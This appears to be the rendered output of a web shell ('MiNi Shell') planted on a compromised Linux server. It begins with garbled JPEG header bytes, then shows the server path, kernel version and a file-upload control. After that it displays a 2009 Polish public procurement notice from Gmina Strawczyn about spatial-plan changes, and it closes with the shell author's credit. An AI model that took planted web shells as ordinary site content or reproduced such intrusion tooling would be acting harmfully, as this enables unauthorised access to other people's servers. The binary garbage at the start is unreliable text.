JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091002/168205-N-2009.html

<p class="kh_header"><b>Strawczyn: Przedmiot zamówienia obejmuje wprowadzenie jednostkowych zmian do miejscowego planu zagospodarowania przestrzennego gminy Strawczyn w granicach sołectw.</b><br>
<b>Numer ogłoszenia: 168205 - 2009; data zamieszczenia: 02.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strawczyn , ul. Stefana Żeromskiego 16, 26-067 Strawczyn, woj. świętokrzyskie, tel. 041 3038002, faks 041 3038157.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://strawczyn.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia obejmuje wprowadzenie jednostkowych zmian do miejscowego planu zagospodarowania przestrzennego gminy Strawczyn w granicach sołectw..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje wprowadzenie jednostkowych zmian do miejscowego planu zagospodarowania przestrzennego gminy Strawczyn w granicach sołectw z podziałem na zadania:
Zadanie Nr 1 - sołectwo Hucisko o całkowitej pow. 495,30 ha
Zadanie Nr 2 - sołectwo Korczyn o całkowitej pow. 811,50 ha
Zadanie Nr 3 - sołectwo Kuźniaki o całkowitej pow. 426,10 ha
Zadanie Nr 4 - sołectwo Małogoskie o całkowitej pow. 284,47 ha
Zadanie Nr 5 - sołectwo Niedźwiedź o całkowitej pow. 724,40 ha
Zadanie Nr 6 - sołectwo Oblęgór o całkowitej pow. 718,20 ha
Zadanie Nr 7 - sołectwo Strawczyn o całkowitej pow. 859,37 ha
Razem: 4 319,34 ha
z podziałem na etapy:
Etap I     - Sporządzenie ekofizjografii oraz analizy wniosków do zmian w planie.
Etap II	- Sporządzenie projektu zmian w planie i przedstawienie Komisji Architektoniczno-Urbanistycznej.
Etap III   - Uzyskanie opinii i uzgodnień zgodnie z art. 17 pkt. 6 i 7 Ustawy o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 z 2003 r. poz. 717 z późn. zm.).
Etap IV   -  Dostosowanie projektów dokumentów do wymogów ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z dnia 7.11.2008 r.)
Etap V - Wyłożenie do publicznego wglądu, ponowienie niezbędnych czynności wynikających z uwzględnienia uwag oraz  przygotowanie do uchwalenia projektu zmian w planie.
Etap V    -   Czynności wykonywane po uchwaleniu zmian w planie.
Zakres prac jest jednakowy dla wszystkich zadań.
Kod CPV:   74251000-3

Opis przedmiotu zamówienia: 
Przedmiot zamówienia obejmuje jednostkowe zmiany w planie zagospodarowania przestrzennego gminy Strawczyn w siedmiu sołectwach: Hucisko, Korczyn, Kuźniaki, Małogoskie, Niedźwiedź, Oblęgór, Strawczyn (zgodnie z podjętą przez Radę Gminy w Strawczynie uchwałą stanowiącą zał. Nr 7 do SIWZ).
1.1. Zakres zamówienia obejmuje w szczególności:
1) sporządzenie tekstu i rysunku planu zgodnie z art. 15 i 16 obowiązującej ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 z 2003r., poz. 717 z poźn.zm.);
2) opracowanie prognoz oddziaływania na środowisko, spełniającej wymagania określone ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska  (Dz. U.z 2006 Nr 129 poz.902) oraz rozporządzenia Ministra Środowiska z dnia 14 listopada 2002 r.w sprawie szczegółowych warunków, jakim powinna odpowiadać prognoza oddziaływania na środowisko dotycząca projektów miejscowych planów zagospodarowania przestrzennego (Dz. U. Nr 197, poz.1667);
3) sporządzenie prognoz skutków finansowych uchwalenia zmian planu - uwzględniającej wymagania określone w rozporządzeniu Ministra  Infrastruktury z dnia 26 sierpnia 2003 r. ws. wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U. Nr 164, poz.1587);
4) opracowanie wniosków o wyrażenie zgody na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne - zgodnie z ustawą z dnia 3 lutego 1995 r. o ochronie gruntów rolnych i leśnych (Dz.U. Nr 16, poz.78 z poźn. zmiananmi) - o ile zajdzie taka potrzeba;
5) przygotowanie projektów ogłoszeń, obwieszczeń i zawiadomień, uczestniczenie w sesjach Rady Gminy na których podejmowane będą uchwały dotyczące zmian planów oraz we wszystkich innych naradach (spotkaniach), niezbędnych do prawidłowego wykonania zamówienia;
6) przygotowanie propozycji sposobu rozpatrzenia składanych wniosków do zmian planu;
7) przygotowanie projektu zmian planu do opiniowania  i uzgodnień wraz z prognozami;
8) przygotowanie projektu zmian planu wraz z prognozami skutków oddziaływania na środowisko do publicznego wglądu;
9) analiza uwag wniesionych do projektu zmian planu, w tym przedłożenie Wójtowi propozycji sposobu rozpatrzenia;
10) wprowadzenie zmian do projektu zmian planu z podjęciem działań, o których mowa w art. 17 pkt 13 ustawy  na warunkach określonych w powyższym podpunkcie wraz z opracowaniem ostatecznej wersji projektu planu. W przypadku zaistnienia sytuacji,   o której mowa w art. 19 ustawy Wykonawca ponawia powyżej wymienione czynności w zakresie niezbędnym do dokonania tych zmian w przedstawionym do uchwalenia planie projektu;
11) przygotowanie i przekazanie projektu zmian planu w formie umożliwiającej przedstawienie Radzie Gminy do uchwalenia wraz z:
- analizą zgodności projektu planu z ustaleniami Studium,
- listą nieuwzględnionych uwag (wniesionych do projektu planu w wyniku wyłożenia) wraz                                     z propozycją sposobu ich rozpatrzenia w formie projektów załączników do uchwały,
- uzasadnieniem do uchwały,
12) prezentacja projektu planu miejscowego przed Gminną Komisją Urbanistyczno-Architektoniczną, w czasie dyskusji publicznej oraz w okresie opiniowania i uzgadniania jak również Radzie Gminy i jej merytorycznym Komisjom.
1.2. Wszelkie prace projektowe lub czynności nie opisane w ust. 1.1., a wynikające z procedur określonych w Ustawie o planowaniu i zagospodarowaniu przestrzennym oraz przepisach odrębnych, niezbędne do właściwego i kompletnego opracowania dokumentacji projektowej, należy traktować jako oczywiste i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.
1.3. Dopuszcza się możliwość odrębnego sporządzenia i uchwalenia zmian miejscowych planów zagospodarowania przestrzennego dla poszczególnych sołectw.
1.4. Przedmiot zamówienia uznaje się za wykonany i odebrany, kiedy podjęta zostanie uchwała Rady Gminy w Strawczynie, o której mowa w art. 20 ust. 1 ustawy i uzyskana zostanie pozytywna ocena, o której mowa w art. 20 ust. 2 ustawy.
1.5. Przed sporządzeniem oferty, Wykonawca winien zapoznać się z opracowaniami będącymi     w posiadaniu Zamawiającego, tj. Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy, Strategia rozwoju gminy. Kopie tych dokumentów po rozstrzygnięciu postępowania o udzielenie zamówienia publicznego i podpisaniu umowy z Wykonawcą zostaną przez Zamawiającego przekazane Wykonawcy.
1.6. Wykonawca ma obowiązek uwzględnić wszelkie zmiany dokonane w trakcie realizacji zamówienia.
2. Informacja o przedmiocie zamówienia.
2.1. Przedmiotem zmiany w planie jest:
a)   ustalenie  przeznaczenia terenu dla różnorodnych funkcji i form użytkowania,       
b) określenie warunków, zasad i sposobu zabudowy i zagospodarowania terenu;
c) określenie zasad modernizacji, rozbudowy i budowy systemów komunikacji i infrastruktury technicznej;
d) określenie sposobu i terminu tymczasowego zagospodarowania, urządzania i użytkowania terenów
    
3. Wymagane jest opracowanie przedmiotu zamówienia etapami wyszczególnionymi w rozdz. II pkt. 1 niniejszej SIWZ  -  zgodnie z Harmonogramem rzeczowo-finansowym, stanowiącym  załącznik Nr 1 do umowy, stanowiącej załącznik nr 5 do niniejszej SIWZ.

Plan należy wykonać z wykorzystaniem technik komputerowych w wersji elektronicznej oraz w wersji papierowej.

Zgodnie z obowiązującymi wymaganiami Ministra Spraw Wewnętrznych i Administracji projekty uchwał winny być przygotowane w edytorze XML Ministerstwa Spraw Wewnętrznych i Administracji lub w edytorze XML firmy A&BC.
Załączniki graficzne do planu powinny być wykonane w programie EWMAPA oraz w formacie  *.jpg, *.bmp lub podobnym powszechnie używanym, łatwym do odczytu  o rozdzielczości umożliwiającej wyraźny odczyt wszystkich elementów.
Dodatkowo cały plan należy przekazać na nośniku elektronicznym.
4.   Materiały wyjściowe  wg § 2 ust. 1 pkt 1 6  projektu umowy - stanowiącej załącznik nr 5 do niniejszej SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.25.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w   wysokości:
3 000,00 zł ( słownie:  trzy tysiące zł) 
Wadium wnosi się przed upływem terminu składania ofert.
1. Wadium może być wniesione w:
a. pieniądzu,
b. poręczeniach bankowych  lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c. gwarancjach bankowych,
d. gwarancjach ubezpieczeniowych,
e. poręczeniach udzielanych przez podmioty , o których mowa w art. 6b ust.5 pkt 2  ustawy  z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. Nr 109, poz. 1158 z późn. zmianami).
4.  Dowód wniesienia wadium należy załączyć do oferty. 
Uwaga!
W przypadku wniesienia wadium w pieniądzu, załącznikiem do oferty  może być  oryginał  lub kopia/ kserokopia wpłaty  wadium, poświadczona za zgodność z oryginałem przez Wykonawcę. Dla  pozostałych form wniesienia  wadium, wymagane jest złożenie dokumentu w oryginale.

5.   Wykonawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania z ofertą.
6. Nie wniesienie wadium w wymaganym terminie oraz w wymaganej wysokości i formie skutkuje wykluczeniem Wykonawcy z postępowania.
7. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank Spółdzielczy Łopuszno Oddział Strawczyn  Nr  46 8499 0008 0300 0026 2000 0002
z dopiskiem: Wadium  w  przetargu  nieograniczonym  na  wprowadzenie zmian w miejscowym planie zagospodarowania przestrzennego gminy Strawczyn w granicach sołectw gminy(dotyczy zadania Nr ZP-341/29/09).
 
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku  Zamawiającego.
8. Zamawiający niezwłocznie zwróci wadium, gdy:
a/  upłynie termin związania ofertą,
b/  zostanie zawarta umowa,
c/ Zamawiający unieważni postępowanie, a protesty zostaną ostatecznie rozstrzygnięte lub upłynie termin do ich wnoszenia.
9. Zamawiający zwróci niezwłocznie wadium na pisemny wniosek Wykonawcy:
a/ który wycofa ofertę przed upływem terminu składania ofert,
b/ który zostanie wykluczony z postępowania,
c/ którego oferta zostanie odrzucona.

Uwaga:
Złożenie przez Wykonawcę, którego oferta  została odrzucona  lub wykluczonego z postępowania, wniosku o zwrot wadium, jest równoznaczne ze zrzeczeniem się przez Wykonawcę prawa do wniesienia protestu.

10. Jeżeli wadium wniesione będzie w pieniądzu, Zamawiający zwróci je wraz  z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11.  Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca , którego oferta zostanie wybrana:
a/   odmówi podpisania umowy na warunkach określonych w ofercie,
b/   zawarcie umowy stanie  się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się  Wykonawcy, którzy:
1)	spełniają warunki określone przepisami art. 22 ust.1 Pzp,
2)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Pzp,
3)	dysponują osobami posiadającymi uprawnienia i kwalifikacje do wykonania zamówienia tj: głównym  projektantem wpisanym na listę członków właściwej Izby Urbanistów               oraz osobami posiadającymi uprawnienia do projektowania i przynależącymi do właściwej izby samorządu zawodowego. 
4)	posiadają doświadczenie w sporządzaniu projektów miejscowych planów   zagospodarowania przestrzennego, rozumiane jako wykonanie z należytą starannością     w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, co najmniej jednego planu zagospodarowania przestrzennego dla obszaru nie mniejszego niż 50 ha, udokumentowane poprzez podanie informacji o pozycji ogłoszenia w Dzienniku Urzędowym Województwa oraz nazwy i adresu Zamawiającego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a/ oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Pzp wg wzoru  określonego w załączniku Nr 2  do SIWZ,
Wymagana forma dokumentu - oryginał; 
b/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji     działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub  zgłoszenia do ewidencji   działalności  gospodarczej, wystawione nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert.
Wymagana forma dokumentów  - oryginał lub kserokopia poświadczona za zgodność z oryginałem  przez Wykonawcę;
 c/  wykaz osób, które będą wykonywać zamówienie wraz z informacjami na temat ich kwalifikacji w zakresie opisanym w rozdz. VII pkt 3 SIWZ, wg wzoru określonego w załączniku nr 3 do SIWZ z załączeniem dokumentów potwierdzających ich kwalifikacje tj. uprawnienia do projektowania oraz aktualne zaświadczenia o przynależności do właściwej izby samorządu zawodowego (ważne na dzień otwarcia ofert), w  przypadku głównego projektanta aktualne zaświadczenie o przynależności do właściwej Izby Urbanistów (ważne na dzień otwarcia ofert),
Wymagana forma dokumentów: wykaz  - oryginał, pozostałe dokumenty wymienione  w tym punkcie - oryginał lub kserokopia poświadczona za zgodność z oryginałem przez Wykonawcę

d/  wykaz wykonanych w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie planów, zawierający co najmniej 1 plan zagospodarowania przestrzennego dla obszaru nie mniejszego niż 50 ha, z podaniem informacji o  ogłoszeniu ( rok, numer, pozycja)  w Dzienniku Urzędowym Województwa oraz nazwą   i adresem Zamawiającego -  według wzoru określonego w zał.  Nr 4 do SIWZ.
Wymagana forma dokumentu   - oryginał
Uwaga!
Za usługi wykonane w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, uważa się usługi wykonane, których - w przypadku planów miejscowych - publikacja w Dzienniku Urzędowym miała miejsce   w okresie ostatnich trzech lat licząc wstecz od daty upływu terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://strawczyn.4bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Strawczynie
ul. Żeromskiego 16
26-067 Strawczyn
I piętro, pok. Nr 5.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2009 godzina 13:00, miejsce: Urząd Gminy w Strawczynie
ul. Żeromskiego 16
26-067 Strawczyn
I piętro, pok. Nr 2 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com